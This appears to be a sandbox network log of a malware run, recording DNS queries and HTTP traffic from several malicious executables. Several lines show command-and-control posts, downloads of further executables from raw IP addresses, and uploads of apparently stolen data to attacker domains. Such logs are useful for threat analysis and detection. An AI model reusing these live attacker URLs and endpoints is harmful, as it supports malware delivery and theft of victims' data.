Date: Tue, 26 Nov 2024 01:58:32 GMT
Content-Length: 35631
Connection: keep-alive
Set-Cookie: sessionid=adb9a85357a13eb8fd6ad173; Path=/; Secure; SameSite=None
Set-Cookie: steamCountry=GB%7C7d625a3b038bb98f68b4e14dac147806; Path=/; Secure; HttpOnly; SameSite=None
GET

http://185.215.113.206/

f8bcf7e83e.exe

Remote address:

185.215.113.206:80

Request

GET / HTTP/1.1
Host: 185.215.113.206
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Tue, 26 Nov 2024 01:58:32 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
POST

http://185.215.113.206/c4becf79229cb002.php

f8bcf7e83e.exe

Remote address:

185.215.113.206:80

Request

POST /c4becf79229cb002.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----ECFHJKEBAAECBFHIECGI
Host: 185.215.113.206
Content-Length: 211
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Tue, 26 Nov 2024 01:58:32 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 8
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
DNS

marshal-zhukov.com

72c1b8c8ee.exe

Remote address:

8.8.8.8:53

Request

marshal-zhukov.com

IN A

Response

marshal-zhukov.com

IN A

172.67.160.80

marshal-zhukov.com

IN A

104.21.82.174
POST

https://marshal-zhukov.com/api

72c1b8c8ee.exe

Remote address:

172.67.160.80:443

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: marshal-zhukov.com

Response

HTTP/1.1 200 OK

Date: Tue, 26 Nov 2024 01:58:32 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=el2a7s4ihrr59utg8sl89q0ttb; expires=Fri, 21-Mar-2025 19:45:11 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lTNSS0DLZKl9RRpIjF1K8nNyn2zAllxZFFKEJ8%2B8g8RctA%2BnS9A5i8domDg3UOq3Jqu44035MFJFZDwouV8dBGAslRaiy1swkF%2BeVFiNz1CzDsycOrN4cEkP%2FMhYfTBy%2BltngFs%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8e86462718f49511-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=60820&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2865&recv_bytes=586&delivery_rate=64406&cwnd=248&unsent_bytes=0&cid=a888be0e832397fa&ts=266&x=0"
DNS

fvtekk5pn.top

ba9783936d.exe

Remote address:

8.8.8.8:53

Request

fvtekk5pn.top

IN A

Response

fvtekk5pn.top

IN A

34.116.198.130
DNS

fvtekk5pn.top

ba9783936d.exe

Remote address:

8.8.8.8:53

Request

fvtekk5pn.top

IN AAAA

Response
POST

http://fvtekk5pn.top/v1/upload.php

ba9783936d.exe

Remote address:

34.116.198.130:80

Request

POST /v1/upload.php HTTP/1.1
Host: fvtekk5pn.top
Accept: */*
Content-Length: 464
Content-Type: multipart/form-data; boundary=------------------------dCelh85WdGEGoMoDsaWGUL

Response

HTTP/1.1 200 OK

server: nginx/1.24.0 (Ubuntu)
date: Tue, 26 Nov 2024 01:58:46 GMT
content-type: text/plain; charset=utf-8
content-length: 2
x-ratelimit-limit: 30
x-ratelimit-remaining: 25
x-ratelimit-reset: 1732587936
etag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc"
DNS

youtube.com

firefox.exe

Remote address:

8.8.8.8:53

Request

youtube.com

IN A

Response

youtube.com

IN A

172.217.169.78
DNS

youtube.com

firefox.exe

Remote address:

8.8.8.8:53

Request

youtube.com

IN A
DNS

spocs.getpocket.com

firefox.exe

Remote address:

8.8.8.8:53

Request

spocs.getpocket.com

IN A

Response

spocs.getpocket.com

IN CNAME

prod.ads.prod.webservices.mozgcp.net

prod.ads.prod.webservices.mozgcp.net

IN A

34.117.188.166
DNS

getpocket.cdn.mozilla.net

firefox.exe

Remote address:

8.8.8.8:53

Request

getpocket.cdn.mozilla.net

IN A

Response

getpocket.cdn.mozilla.net

IN CNAME

getpocket-cdn.prod.mozaws.net

getpocket-cdn.prod.mozaws.net

IN CNAME

prod.pocket.prod.cloudops.mozgcp.net

prod.pocket.prod.cloudops.mozgcp.net

IN A

34.120.5.221
DNS

prod.ads.prod.webservices.mozgcp.net

firefox.exe

Remote address:

8.8.8.8:53

Request

prod.ads.prod.webservices.mozgcp.net

IN A

Response

prod.ads.prod.webservices.mozgcp.net

IN A

34.117.188.166
DNS

prod.ads.prod.webservices.mozgcp.net

firefox.exe

Remote address:

8.8.8.8:53

Request

prod.ads.prod.webservices.mozgcp.net

IN A
DNS

prod.pocket.prod.cloudops.mozgcp.net

firefox.exe

Remote address:

8.8.8.8:53

Request

prod.pocket.prod.cloudops.mozgcp.net

IN A

Response

prod.pocket.prod.cloudops.mozgcp.net

IN A

34.120.5.221
DNS

prod.pocket.prod.cloudops.mozgcp.net

firefox.exe

Remote address:

8.8.8.8:53

Request

prod.pocket.prod.cloudops.mozgcp.net

IN A
DNS

prod.content-signature-chains.prod.webservices.mozgcp.net

firefox.exe

Remote address:

8.8.8.8:53

Request

prod.content-signature-chains.prod.webservices.mozgcp.net

IN A

Response

prod.content-signature-chains.prod.webservices.mozgcp.net

IN A

34.160.144.191
DNS

prod.content-signature-chains.prod.webservices.mozgcp.net

firefox.exe

Remote address:

8.8.8.8:53

Request

prod.content-signature-chains.prod.webservices.mozgcp.net

IN AAAA

Response

prod.content-signature-chains.prod.webservices.mozgcp.net

IN AAAA

2600:1901:0:92a9::
GET

https://getpocket.cdn.mozilla.net/v3/firefox/global-recs?version=3&consumer_key=40249-e88c401e1b1f2242d9e441c4&locale_lang=en-US&region=GB&count=30

firefox.exe

Remote address:

34.120.5.221:443

Request

GET /v3/firefox/global-recs?version=3&consumer_key=40249-e88c401e1b1f2242d9e441c4&locale_lang=en-US&region=GB&count=30 HTTP/2.0
host: getpocket.cdn.mozilla.net
user-agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
sec-fetch-dest: empty
sec-fetch-mode: cors
sec-fetch-site: cross-site
if-none-match: W/"5395-zuqlHshIosLNxsVZ1yDB7WQXaJg"
te: trailers
DNS

firefox-settings-attachments.cdn.mozilla.net

firefox.exe

Remote address:

8.8.8.8:53

Request

firefox-settings-attachments.cdn.mozilla.net

IN A

Response

firefox-settings-attachments.cdn.mozilla.net

IN CNAME

attachments.prod.remote-settings.prod.webservices.mozgcp.net

attachments.prod.remote-settings.prod.webservices.mozgcp.net

IN A

34.117.121.53
DNS

prod.ads.prod.webservices.mozgcp.net

firefox.exe

Remote address:

8.8.8.8:53

Request

prod.ads.prod.webservices.mozgcp.net

IN AAAA

Response
DNS

prod.pocket.prod.cloudops.mozgcp.net

firefox.exe

Remote address:

8.8.8.8:53

Request

prod.pocket.prod.cloudops.mozgcp.net

IN AAAA

Response

prod.pocket.prod.cloudops.mozgcp.net

IN AAAA

2600:1901:0:524c::
DNS

prod.remote-settings.prod.webservices.mozgcp.net

firefox.exe

Remote address:

8.8.8.8:53

Request

prod.remote-settings.prod.webservices.mozgcp.net

IN A

Response

prod.remote-settings.prod.webservices.mozgcp.net

IN A

34.149.100.209
DNS

attachments.prod.remote-settings.prod.webservices.mozgcp.net

firefox.exe

Remote address:

8.8.8.8:53

Request

attachments.prod.remote-settings.prod.webservices.mozgcp.net

IN A

Response

attachments.prod.remote-settings.prod.webservices.mozgcp.net

IN A

34.117.121.53
DNS

prod.remote-settings.prod.webservices.mozgcp.net

firefox.exe

Remote address:

8.8.8.8:53

Request

prod.remote-settings.prod.webservices.mozgcp.net

IN AAAA

Response
DNS

attachments.prod.remote-settings.prod.webservices.mozgcp.net

firefox.exe

Remote address:

8.8.8.8:53

Request

attachments.prod.remote-settings.prod.webservices.mozgcp.net

IN AAAA

Response
GET

https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd

firefox.exe

Remote address:

172.217.169.78:443

Request

GET /account?=https://accounts.google.com/v3/signin/challenge/pwd HTTP/2.0
host: youtube.com
user-agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
upgrade-insecure-requests: 1
sec-fetch-dest: document
sec-fetch-mode: navigate
sec-fetch-site: none
sec-fetch-user: ?1
te: trailers
DNS

youtube.com

firefox.exe

Remote address:

8.8.8.8:53

Request

youtube.com

IN A

Response

youtube.com

IN A

172.217.169.78
DNS

youtube.com

firefox.exe

Remote address:

8.8.8.8:53

Request

youtube.com

IN AAAA

Response

youtube.com

IN AAAA

2a00:1450:4009:819::200e
DNS

shavar.prod.mozaws.net

firefox.exe

Remote address:

8.8.8.8:53

Request

shavar.prod.mozaws.net

IN A

Response

shavar.prod.mozaws.net

IN A

52.32.237.164

shavar.prod.mozaws.net

IN A

52.27.142.243

shavar.prod.mozaws.net

IN A

34.209.229.249
DNS

shavar.prod.mozaws.net

firefox.exe

Remote address:

8.8.8.8:53

Request

shavar.prod.mozaws.net

IN AAAA

Response
DNS

shavar.prod.mozaws.net

firefox.exe

Remote address:

8.8.8.8:53

Request

shavar.prod.mozaws.net

IN AAAA
DNS

shavar.prod.mozaws.net

firefox.exe

Remote address:

8.8.8.8:53

Request

shavar.prod.mozaws.net

IN AAAA
DNS

www.youtube.com

firefox.exe

Remote address:

8.8.8.8:53

Request

www.youtube.com

IN A

Response

www.youtube.com

IN CNAME

youtube-ui.l.google.com

youtube-ui.l.google.com

IN A

172.217.169.78

youtube-ui.l.google.com

IN A

142.250.180.14

youtube-ui.l.google.com

IN A

172.217.16.238

youtube-ui.l.google.com

IN A

142.250.179.238

youtube-ui.l.google.com

IN A

142.250.187.238

youtube-ui.l.google.com

IN A

216.58.204.78

youtube-ui.l.google.com

IN A

142.250.187.206

youtube-ui.l.google.com

IN A

142.250.200.14

youtube-ui.l.google.com

IN A

216.58.212.206

youtube-ui.l.google.com

IN A

172.217.169.46

youtube-ui.l.google.com

IN A

142.250.200.46

youtube-ui.l.google.com

IN A

216.58.201.110

youtube-ui.l.google.com

IN A

142.250.178.14

youtube-ui.l.google.com

IN A

216.58.212.238
DNS

www.youtube.com

firefox.exe

Remote address:

8.8.8.8:53

Request

www.youtube.com

IN A
DNS

www.youtube.com

firefox.exe

Remote address:

8.8.8.8:53

Request

www.youtube.com

IN A
DNS

youtube-ui.l.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

youtube-ui.l.google.com

IN A

Response

youtube-ui.l.google.com

IN A

216.58.212.206

youtube-ui.l.google.com

IN A

216.58.212.238

youtube-ui.l.google.com

IN A

172.217.169.46

youtube-ui.l.google.com

IN A

172.217.169.78

youtube-ui.l.google.com

IN A

142.250.180.14

youtube-ui.l.google.com

IN A

142.250.178.14

youtube-ui.l.google.com

IN A

172.217.16.238

youtube-ui.l.google.com

IN A

216.58.201.110

youtube-ui.l.google.com

IN A

142.250.200.46

youtube-ui.l.google.com

IN A

142.250.200.14

youtube-ui.l.google.com

IN A

216.58.204.78

youtube-ui.l.google.com

IN A

142.250.187.206

youtube-ui.l.google.com

IN A

142.250.187.238

youtube-ui.l.google.com

IN A

142.250.179.238
DNS

youtube-ui.l.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

youtube-ui.l.google.com

IN A
DNS

youtube-ui.l.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

youtube-ui.l.google.com

IN A
DNS

youtube-ui.l.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

youtube-ui.l.google.com

IN A
DNS

youtube-ui.l.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

youtube-ui.l.google.com

IN A
DNS

consent.youtube.com

firefox.exe

Remote address:

8.8.8.8:53

Request

consent.youtube.com

IN A

Response

consent.youtube.com

IN A

216.58.201.110
DNS

consent.youtube.com

firefox.exe

Remote address:

8.8.8.8:53

Request

consent.youtube.com

IN A

Response

consent.youtube.com

IN A

216.58.201.110
DNS

consent.youtube.com

firefox.exe

Remote address:

8.8.8.8:53

Request

consent.youtube.com

IN A
GET

https://consent.youtube.com/m?continue=https%3A%2F%2Fwww.youtube.com%2Faccount%3F%3Dhttps%253A%252F%252Faccounts.google.com%252Fv3%252Fsignin%252Fchallenge%252Fpwd%26cbrd%3D1&gl=GB&m=0&pc=yt&cm=2&hl=en&src=1

firefox.exe

Remote address:

216.58.201.110:443

Request

GET /m?continue=https%3A%2F%2Fwww.youtube.com%2Faccount%3F%3Dhttps%253A%252F%252Faccounts.google.com%252Fv3%252Fsignin%252Fchallenge%252Fpwd%26cbrd%3D1&gl=GB&m=0&pc=yt&cm=2&hl=en&src=1 HTTP/2.0
host: consent.youtube.com
user-agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
cookie: SOCS=CAAaBgiAn5S6Bg
cookie: YSC=H20jt0QTx5w
cookie: __Secure-YEC=CgtZZGxfbE9IWWIyMCjT1pS6BjIKCgJHQhIEGgAgbg%3D%3D
cookie: VISITOR_PRIVACY_METADATA=CgJHQhIEGgAgbg%3D%3D
upgrade-insecure-requests: 1
sec-fetch-dest: document
sec-fetch-mode: navigate
sec-fetch-site: none
sec-fetch-user: ?1
te: trailers
DNS

consent.youtube.com

firefox.exe

Remote address:

8.8.8.8:53

Request

consent.youtube.com

IN AAAA

Response

consent.youtube.com

IN AAAA

2a00:1450:4009:826::200e
DNS

consent.youtube.com

firefox.exe

Remote address:

8.8.8.8:53

Request

consent.youtube.com

IN AAAA
DNS

fvtekk5pn.top

ba9783936d.exe

Remote address:

8.8.8.8:53

Request

fvtekk5pn.top

IN A

Response

fvtekk5pn.top

IN A

34.116.198.130
DNS

fvtekk5pn.top

ba9783936d.exe

Remote address:

8.8.8.8:53

Request

fvtekk5pn.top

IN AAAA

Response
POST

http://fvtekk5pn.top/v1/upload.php

ba9783936d.exe

Remote address:

34.116.198.130:80

Request

POST /v1/upload.php HTTP/1.1
Host: fvtekk5pn.top
Accept: */*
Content-Length: 3424
Content-Type: multipart/form-data; boundary=------------------------RrZrqL22gxUM2PCCNbPWTN

Response

HTTP/1.1 200 OK

server: nginx/1.24.0 (Ubuntu)
date: Tue, 26 Nov 2024 01:58:56 GMT
content-type: text/plain; charset=utf-8
content-length: 2
x-ratelimit-limit: 30
x-ratelimit-remaining: 23
x-ratelimit-reset: 1732587936
etag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc"
DNS

youtube-ui.l.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

youtube-ui.l.google.com

IN AAAA

Response

youtube-ui.l.google.com

IN AAAA

2a00:1450:4009:827::200e

youtube-ui.l.google.com

IN AAAA

2a00:1450:4009:818::200e

youtube-ui.l.google.com

IN AAAA

2a00:1450:4009:80b::200e

youtube-ui.l.google.com

IN AAAA

2a00:1450:4009:80a::200e
DNS

www.google.com

chrome.exe

Remote address:

8.8.8.8:53

Request

www.google.com

IN A

Response

www.google.com

IN A

172.217.16.228
DNS

www.google.com

chrome.exe

Remote address:

8.8.8.8:53

Request

www.google.com

IN A
GET

https://www.google.com/favicon.ico

firefox.exe

Remote address:

172.217.16.228:443

Request

GET /favicon.ico HTTP/2.0
host: www.google.com
user-agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: image/avif,image/webp,*/*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
referer: https://consent.youtube.com/
sec-fetch-dest: image
sec-fetch-mode: no-cors
sec-fetch-site: cross-site
te: trailers
DNS

www.google.com

chrome.exe

Remote address:

8.8.8.8:53

Request

www.google.com

IN A

Response

www.google.com

IN A

172.217.16.228
DNS

www.google.com

chrome.exe

Remote address:

8.8.8.8:53

Request

www.google.com

IN AAAA

Response

www.google.com

IN AAAA

2a00:1450:4009:821::2004
DNS

consent.youtube.com

firefox.exe

Remote address:

8.8.8.8:53

Request

consent.youtube.com

IN A

Response

consent.youtube.com

IN A

216.58.201.110
DNS

consent.youtube.com

firefox.exe

Remote address:

8.8.8.8:53

Request

consent.youtube.com

IN A
DNS

consent.youtube.com

firefox.exe

Remote address:

8.8.8.8:53

Request

consent.youtube.com

IN A
DNS

consent.youtube.com

firefox.exe

Remote address:

8.8.8.8:53

Request

consent.youtube.com

IN A
DNS

consent.youtube.com

firefox.exe

Remote address:

8.8.8.8:53

Request

consent.youtube.com

IN A

Response

consent.youtube.com

IN A

216.58.201.110
GET

https://www.google.com/async/ddljson?async=ntp:2

chrome.exe

Remote address:

172.217.16.228:443

Request

GET /async/ddljson?async=ntp:2 HTTP/2.0
host: www.google.com
sec-fetch-site: none
sec-fetch-mode: no-cors
sec-fetch-dest: empty
user-agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
GET

https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0

chrome.exe

Remote address:

172.217.16.228:443

Request

GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/2.0
host: www.google.com
x-client-data: CI3uygE=
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: empty
user-agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
GET

https://www.google.com/async/newtab_promos

chrome.exe

Remote address:

172.217.16.228:443

Request

GET /async/newtab_promos HTTP/2.0
host: www.google.com
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: empty
user-agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
DNS

fvtekk5pn.top

ba9783936d.exe

Remote address:

8.8.8.8:53

Request

fvtekk5pn.top

IN A

Response

fvtekk5pn.top

IN A

34.116.198.130
DNS

fvtekk5pn.top

ba9783936d.exe

Remote address:

8.8.8.8:53

Request

fvtekk5pn.top

IN AAAA

Response
POST

http://fvtekk5pn.top/v1/upload.php

ba9783936d.exe

Remote address:

34.116.198.130:80

Request

POST /v1/upload.php HTTP/1.1
Host: fvtekk5pn.top
Accept: */*
Content-Length: 24420
Content-Type: multipart/form-data; boundary=------------------------RAnOeSfxX9LN1AXVSbrfLZ

Response

HTTP/1.1 200 OK

server: nginx/1.24.0 (Ubuntu)
date: Tue, 26 Nov 2024 01:59:06 GMT
content-type: text/plain; charset=utf-8
content-length: 2
x-ratelimit-limit: 30
x-ratelimit-remaining: 21
x-ratelimit-reset: 1732587936
etag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc"
DNS

prod.balrog.prod.cloudops.mozgcp.net

firefox.exe

Remote address:

8.8.8.8:53

Request

prod.balrog.prod.cloudops.mozgcp.net

IN A

Response

prod.balrog.prod.cloudops.mozgcp.net

IN A

35.244.181.201
DNS

prod.balrog.prod.cloudops.mozgcp.net

firefox.exe

Remote address:

8.8.8.8:53

Request

prod.balrog.prod.cloudops.mozgcp.net

IN AAAA

Response
DNS

ciscobinary.openh264.org

firefox.exe

Remote address:

8.8.8.8:53

Request

ciscobinary.openh264.org

IN A

Response

ciscobinary.openh264.org

IN CNAME

a21ed24aedde648804e7-228765c84088fef4ff5e70f2710398e9.r17.cf1.rackcdn.com

a21ed24aedde648804e7-228765c84088fef4ff5e70f2710398e9.r17.cf1.rackcdn.com

IN CNAME

a17.rackcdn.com

a17.rackcdn.com

IN CNAME

a17.rackcdn.com.mdc.edgesuite.net

a17.rackcdn.com.mdc.edgesuite.net

IN CNAME

a19.dscg10.akamai.net

a19.dscg10.akamai.net

IN A

88.221.134.209

a19.dscg10.akamai.net

IN A

88.221.134.155
GET

http://ciscobinary.openh264.org/openh264-win64-2e1774ab6dc6c43debb0b5b628bdf122a391d521.zip

firefox.exe

Remote address:

88.221.134.209:80

Request

GET /openh264-win64-2e1774ab6dc6c43debb0b5b628bdf122a391d521.zip HTTP/1.1
Host: ciscobinary.openh264.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive

Response

HTTP/1.1 200 OK

Last-Modified: Fri, 08 Nov 2024 02:52:28 GMT
ETag: 85430baed3398695717b0263807cf97c
Content-Length: 453023
Accept-Ranges: bytes
X-Timestamp: 1731034347.00215
Content-Type: application/zip
X-Trans-Id: tx264693c458e9421d8a991-006730bfe7dfw1
Cache-Control: public, max-age=194512
Expires: Thu, 28 Nov 2024 08:01:13 GMT
Date: Tue, 26 Nov 2024 01:59:21 GMT
Connection: keep-alive
DNS

a19.dscg10.akamai.net

firefox.exe

Remote address:

8.8.8.8:53

Request

a19.dscg10.akamai.net

IN A

Response

a19.dscg10.akamai.net

IN A

88.221.134.209

a19.dscg10.akamai.net

IN A

88.221.134.155
DNS

a19.dscg10.akamai.net

firefox.exe

Remote address:

8.8.8.8:53

Request

a19.dscg10.akamai.net

IN AAAA

Response

a19.dscg10.akamai.net

IN AAAA

2a02:26f0:a1::58dd:869b

a19.dscg10.akamai.net

IN AAAA

2a02:26f0:a1::58dd:86d1
DNS

redirector.gvt1.com

firefox.exe

Remote address:

8.8.8.8:53

Request

redirector.gvt1.com

IN A

Response

redirector.gvt1.com

IN A

172.217.169.46
DNS

redirector.gvt1.com

firefox.exe

Remote address:

8.8.8.8:53

Request

redirector.gvt1.com

IN A

Response

redirector.gvt1.com

IN A

172.217.169.46
DNS

redirector.gvt1.com

firefox.exe

Remote address:

8.8.8.8:53

Request

redirector.gvt1.com

IN AAAA

Response

redirector.gvt1.com

IN AAAA

2a00:1450:4009:818::200e
DNS

r4---sn-4g5e6ns7.gvt1.com

firefox.exe

Remote address:

8.8.8.8:53

Request

r4---sn-4g5e6ns7.gvt1.com

IN A

Response

r4---sn-4g5e6ns7.gvt1.com

IN CNAME

r4.sn-4g5e6ns7.gvt1.com

r4.sn-4g5e6ns7.gvt1.com

IN A

173.194.182.73
DNS

r4.sn-4g5e6ns7.gvt1.com

firefox.exe

Remote address:

8.8.8.8:53

Request

r4.sn-4g5e6ns7.gvt1.com

IN A

Response

r4.sn-4g5e6ns7.gvt1.com

IN A

173.194.182.73
DNS

r4.sn-4g5e6ns7.gvt1.com

firefox.exe

Remote address:

8.8.8.8:53

Request

r4.sn-4g5e6ns7.gvt1.com

IN AAAA

Response

r4.sn-4g5e6ns7.gvt1.com

IN AAAA

2a00:1450:4001:5c::9
DNS

play.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

play.google.com

IN A

Response

play.google.com

IN A

142.250.187.206
POST

https://play.google.com/log?hasfast=true&authuser=0&format=json

firefox.exe

Remote address:

142.250.187.206:443

Request

POST /log?hasfast=true&authuser=0&format=json HTTP/2.0
host: play.google.com
user-agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
referer: https://consent.youtube.com/
content-type: text/plain;charset=UTF-8
content-length: 763
origin: https://consent.youtube.com
sec-fetch-dest: empty
sec-fetch-mode: no-cors
sec-fetch-site: cross-site
te: trailers
DNS

play.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

play.google.com

IN A

Response

play.google.com

IN A

142.250.187.206
DNS

play.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

play.google.com

IN AAAA

Response

play.google.com

IN AAAA

2a00:1450:4009:81f::200e
DNS

consent.youtube.com

firefox.exe

Remote address:

8.8.8.8:53

Request

consent.youtube.com

IN A

Response

consent.youtube.com

IN A

216.58.201.110
DNS

consent.youtube.com

firefox.exe

Remote address:

8.8.8.8:53

Request

consent.youtube.com

IN A

Response

consent.youtube.com

IN A

216.58.201.110

185.215.113.43:80

http://185.215.113.43/Zu7JuNko/index.php

http

skotes.exe

2.4kB
2.9kB
19
14

HTTP Request

POST http://185.215.113.43/Zu7JuNko/index.php

HTTP Response

200

HTTP Request

POST http://185.215.113.43/Zu7JuNko/index.php

HTTP Response

200

HTTP Request

POST http://185.215.113.43/Zu7JuNko/index.php

HTTP Response

200

HTTP Request

POST http://185.215.113.43/Zu7JuNko/index.php

HTTP Response

200

HTTP Request

POST http://185.215.113.43/Zu7JuNko/index.php

HTTP Response

200

HTTP Request

POST http://185.215.113.43/Zu7JuNko/index.php

HTTP Response

200

HTTP Request

POST http://185.215.113.43/Zu7JuNko/index.php

HTTP Response

200

HTTP Request

POST http://185.215.113.43/Zu7JuNko/index.php

HTTP Response

200
31.41.244.11:80

http://31.41.244.11/files/random.exe

http

skotes.exe

84.0kB
4.6MB
1781
4818

HTTP Request

GET http://31.41.244.11/files/7407486059/1Shasou.exe

HTTP Response

200

HTTP Request

GET http://31.41.244.11/files/random.exe

HTTP Response

200
185.244.212.106:2227

1Shasou.exe

33.7kB
892 B
28
22
34.116.198.130:80

http://home.fvtekk5pn.top/LCXOUUtXgrKhKDLYSbzW1732019347

http

ba9783936d.exe

273.8kB
11.1MB
5194
7985

HTTP Request

GET http://home.fvtekk5pn.top/LCXOUUtXgrKhKDLYSbzW1732019347

HTTP Response

200
185.215.113.16:80

http://185.215.113.16/off/random.exe

http

skotes.exe

147.2kB
5.8MB
2747
4187

HTTP Request

GET http://185.215.113.16/luma/random.exe

HTTP Response

200

HTTP Request

GET http://185.215.113.16/steam/random.exe

HTTP Response

200

HTTP Request

GET http://185.215.113.16/well/random.exe

HTTP Response

200

HTTP Request

GET http://185.215.113.16/off/random.exe

HTTP Response

200
104.21.7.169:443

https://occupy-blushi.sbs/api

tls, http

72c1b8c8ee.exe

981 B
4.3kB
9
9

HTTP Request

POST https://occupy-blushi.sbs/api

HTTP Response

200
172.67.153.209:443

https://blade-govern.sbs/api

tls, http

72c1b8c8ee.exe

980 B
4.3kB
9
9

HTTP Request

POST https://blade-govern.sbs/api

HTTP Response

200
104.21.1.25:443

https://story-tense-faz.sbs/api

tls, http

72c1b8c8ee.exe

983 B
4.3kB
9
9

HTTP Request

POST https://story-tense-faz.sbs/api

HTTP Response

200
172.67.223.140:443

https://disobey-curly.sbs/api

tls, http

72c1b8c8ee.exe

981 B
4.3kB
9
9

HTTP Request

POST https://disobey-curly.sbs/api

HTTP Response

200
104.21.94.231:443

https://motion-treesz.sbs/api

tls, http

72c1b8c8ee.exe

981 B
4.3kB
9
9

HTTP Request

POST https://motion-treesz.sbs/api

HTTP Response

200
104.21.19.173:443

https://powerful-avoids.sbs/api

tls, http

72c1b8c8ee.exe

983 B
4.4kB
9
9

HTTP Request

POST https://powerful-avoids.sbs/api

HTTP Response

200
2.22.99.85:443

https://steamcommunity.com/profiles/76561199724331900

tls, http

72c1b8c8ee.exe

1.6kB
43.1kB
24
38

HTTP Request

GET https://steamcommunity.com/profiles/76561199724331900

HTTP Response

200
185.215.113.206:80

http://185.215.113.206/c4becf79229cb002.php

http

f8bcf7e83e.exe

727 B
625 B
5
5

HTTP Request

GET http://185.215.113.206/

HTTP Response

200

HTTP Request

POST http://185.215.113.206/c4becf79229cb002.php

HTTP Response

200
172.67.160.80:443

https://marshal-zhukov.com/api

tls, http

72c1b8c8ee.exe

982 B
4.4kB
9
9

HTTP Request

POST https://marshal-zhukov.com/api

HTTP Response

200
34.116.198.130:80

http://fvtekk5pn.top/v1/upload.php

http

ba9783936d.exe

1.2kB
790 B
11
6

HTTP Request

POST http://fvtekk5pn.top/v1/upload.php

HTTP Response

200
34.120.5.221:443

getpocket.cdn.mozilla.net

firefox.exe

104 B
2
34.120.5.221:443

https://getpocket.cdn.mozilla.net/v3/firefox/global-recs?version=3&consumer_key=40249-e88c401e1b1f2242d9e441c4&locale_lang=en-US&region=GB&count=30

tls, http2

firefox.exe

2.1kB
15.6kB
20
22

HTTP Request

GET https://getpocket.cdn.mozilla.net/v3/firefox/global-recs?version=3&consumer_key=40249-e88c401e1b1f2242d9e441c4&locale_lang=en-US&region=GB&count=30
34.117.121.53:443

firefox-settings-attachments.cdn.mozilla.net

tls

firefox.exe

2.4kB
9.3kB
25
20
172.217.169.78:443

youtube.com

tls, http2

firefox.exe

1.6kB
7.6kB
12
10
172.217.169.78:443

https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd

tls, http2

firefox.exe

2.8kB
